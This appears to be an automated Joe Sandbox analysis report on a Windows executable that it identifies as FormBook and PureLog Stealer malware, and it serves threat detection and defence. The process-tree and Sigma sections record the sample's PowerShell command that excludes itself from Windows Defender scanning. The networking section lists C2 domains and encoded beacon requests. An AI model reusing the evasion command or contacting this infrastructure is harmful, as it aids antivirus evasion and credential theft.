Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO -2025918.exe

Overview

General Information

Sample name:PO -2025918.exe
Analysis ID:1592062
MD5:cb01d48baf8a685f7f8233565e3cbfb7
SHA1:b205be3b958db2891cd2582131ed22d89b37bc07
SHA256:7365e206478fad792a4c64390b32e1d21b16a5c080a6215eba8498c638877f06
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • PO -2025918.exe (PID: 6680 cmdline: "C:\Users\user\Desktop\PO -2025918.exe" MD5: CB01D48BAF8A685F7F8233565E3CBFB7)
    • powershell.exe (PID: 3704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PO -2025918.exe (PID: 932 cmdline: "C:\Users\user\Desktop\PO -2025918.exe" MD5: CB01D48BAF8A685F7F8233565E3CBFB7)
      • nWrCyfejRZk.exe (PID: 3068 cmdline: "C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 7160 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • nWrCyfejRZk.exe (PID: 4564 cmdline: "C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2892 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000000.00000002.1870856601.0000000003759000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PO -2025918.exe.7040000.6.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.PO -2025918.exe.3777590.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.PO -2025918.exe.7040000.6.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.PO -2025918.exe.2b71520.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    4.2.PO -2025918.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                      Click to see the 4 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO -2025918.exe", ParentImage: C:\Users\user\Desktop\PO -2025918.exe, ParentProcessId: 6680, ParentProcessName: PO -2025918.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", ProcessId: 3704, ProcessName: powershell.exe
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO -2025918.exe", ParentImage: C:\Users\user\Desktop\PO -2025918.exe, ParentProcessId: 6680, ParentProcessName: PO -2025918.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", ProcessId: 3704, ProcessName: powershell.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO -2025918.exe", ParentImage: C:\Users\user\Desktop\PO -2025918.exe, ParentProcessId: 6680, ParentProcessName: PO -2025918.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe", ProcessId: 3704, ProcessName: powershell.exe

                      Suricata Signatures

                      No Suricata rule has matched

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: PO -2025918.exeVirustotal: Detection: 52%Perma Link
                      Source: PO -2025918.exeReversingLabs: Detection: 57%
                      Yara detected FormBook
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.PO -2025918.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.2125323216.0000000001A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539706427.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3540022925.0000000002D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.3539953830.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.3543046045.0000000005840000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2126495744.0000000002050000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.3540990423.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: PO -2025918.exeJoe Sandbox ML: detected
                      Source: PO -2025918.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: PO -2025918.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: route.pdb source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nWrCyfejRZk.exe, 00000008.00000002.3539862270.000000000080E000.00000002.00000001.01000000.0000000C.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3539737023.000000000080E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: PO -2025918.exe, PO -2025918.exe, 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000009.00000003.2125155011.0000000002F03000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.000000000342E000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000003.2127202503.00000000030DF000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000009.00000002.3541311070.0000000003290000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: route.pdbGCTL source: PO -2025918.exe, 00000004.00000002.2124918917.0000000001708000.00000004.00000020.00020000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540473379.0000000000E98000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 9_2_00AAC600 FindFirstFileW,FindNextFileW,FindClose,9_2_00AAC600
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then xor eax, eax9_2_00A99E10
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then pop edi9_2_00A9E21E
                      Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 4x nop then mov ebx, 00000004h9_2_031A04CE

                      Networking

                      barindex
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.letsbookcruise.xyz
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /tqv2/?6NWT=ubtLSzl&V0=mw5EMDe107YJTqujAq9unz2dxFIqRcwx5FZV14wN+wWnYz/1vECwz9qX0523rVAHVbCkyePm1aNLCJN6m48zwwFGYhIaaAphRdYS1Kl1BiYSwcT5l1L9JEw= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.zucchini.proUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /54nj/?V0=jQd8/d8A1xfb/FB4a5ld7s51nRiuWU3OCzy1kJMEXtEIzwMFNmXFHboA48xWXOtysSrylaZMXPTQl7MuG55JhvpvAlNBW96dL3eN6Dv39YB+Yc5uDns7m3I=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.vh5g.sbsUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /gq43/?V0=h/dnkFjaM/BlMTbdESaBO4yDKWKmOcDz2FnmuGYc567+HDEruSEWMN2Hn86y4gYUgaAN9U29KGW+/f0RM4NOE/Y8+3cOhgXpERP3XxTgx1mSo6tETBq5XpQ=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.actionhub.liveUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /ktot/?6NWT=ubtLSzl&V0=QtQc2mqNJwvMGBSr7V0zPUg2Ke4Xyt62plWHvEnyVDfp5Gg9+XblDX8y1WL79lKxhp5ksn3mik5BgcOnzw4ck6L30rZkuOCe6cRp9wSIOgnwHyHnoLuvl9s= HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.100millionjobs.africaUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /bqha/?V0=XaQS++1s5Z2sQk6g657UrSdcX7H3EUdTMtu3zec/e2geVsN/mry3D0SmJYJJ828Xh6gONHNOHW6qADxKsznE6ZdUGRZN1xACtCVpUj7MYkJvH6jcy3tgXEM=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.qzsazi.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /m320/?V0=Ph0JwVcw7zzuTeHjokN+Pj0vqxzi/qoK5eH0o0l2w/5oKsNqReXVchdY7BGekisn6nC+H3gPoTPDUk5nD7LsnmjV2eR6T95oFo+TtC+4wolZhiL0ouse1nU=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.truckgoway.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficHTTP traffic detected: GET /he9k/?V0=0MI6+xzwqxZaqD2fSvbI+Ez0sKo1K30QNU5KfAdCo3osKEpgr6ecWOPkYYCElD9/ZCs5VNg1QoXcN7il9gzOzrl593t+ZyNHd/O+D84ZuyAEiK4V6BaRopc=&6NWT=ubtLSzl HTTP/1.1Accept: */*Accept-Language: en-USConnection: closeHost: www.aloezhealthcare.infoUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4
                      Source: global trafficDNS traffic detected: DNS query: www.zucchini.pro
                      Source: global trafficDNS traffic detected: DNS query: www.vh5g.sbs
                      Source: global trafficDNS traffic detected: DNS query: www.v89ey584d.shop
                      Source: global trafficDNS traffic detected: DNS query: www.actionhub.live
                      Source: global trafficDNS traffic detected: DNS query: www.100millionjobs.africa
                      Source: global trafficDNS traffic detected: DNS query: www.x3kwqc5tye4vl90y.top
                      Source: global trafficDNS traffic detected: DNS query: www.hwak.live
                      Source: global trafficDNS traffic detected: DNS query: www.qzsazi.info
                      Source: global trafficDNS traffic detected: DNS query: www.truckgoway.info
                      Source: global trafficDNS traffic detected: DNS query: www.aloezhealthcare.info
                      Source: global trafficDNS traffic detected: DNS query: www.letsbookcruise.xyz
                      Source: unknownHTTP traffic detected: POST /54nj/ HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedContent-Length: 199Connection: closeCache-Control: max-age=0Host: www.vh5g.sbsOrigin: http://www.vh5g.sbsReferer: http://www.vh5g.sbs/54nj/User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) GSA/5.2.43972 Mobile/12H321 Safari/600.1.4Data Raw: 56 30 3d 75 53 31 63 38 74 55 50 34 30 66 75 35 54 39 79 64 36 70 42 7a 62 42 6f 67 45 79 59 54 51 32 63 4b 68 79 69 6e 35 67 75 5a 4a 56 7a 36 68 46 34 48 41 76 37 4c 76 34 74 32 4e 74 63 64 64 4a 31 73 41 2b 39 69 59 42 6c 44 76 50 68 6e 4f 64 56 4c 73 39 38 76 73 49 74 42 33 5a 66 5a 2f 6d 45 41 6d 57 6c 2f 67 6a 58 6c 72 64 6d 64 38 6b 36 4b 78 30 66 6f 32 38 79 45 57 72 6f 43 30 6f 69 43 65 63 44 74 48 44 6e 73 31 38 77 34 55 51 71 41 2f 42 62 65 56 52 49 61 32 43 77 78 68 55 55 4e 4f 30 6f 31 54 46 41 62 42 72 53 6f 51 79 4f 41 42 4b 41 36 4c 38 4a 4e 43 34 45 34 41 36 61 52 51 3d 3d Data Ascii: V0=uS1c8tUP40fu5T9yd6pBzbBogEyYTQ2cKhyin5guZJVz6hF4HAv7Lv4t2NtcddJ1sA+9iYBlDvPhnOdVLs98vsItB3ZfZ/mEAmWl/gjXlrdmd8k6Kx0fo28yEWroC0oiCecDtHDns18w4UQqA/BbeVRIa2CwxhUUNO0o1TFAbBrSoQyOABKA6L8JNC4E4A6aRQ==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:30 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 42 6f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 17:16:33 GMTServer: ApacheContent-Length: 32106Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 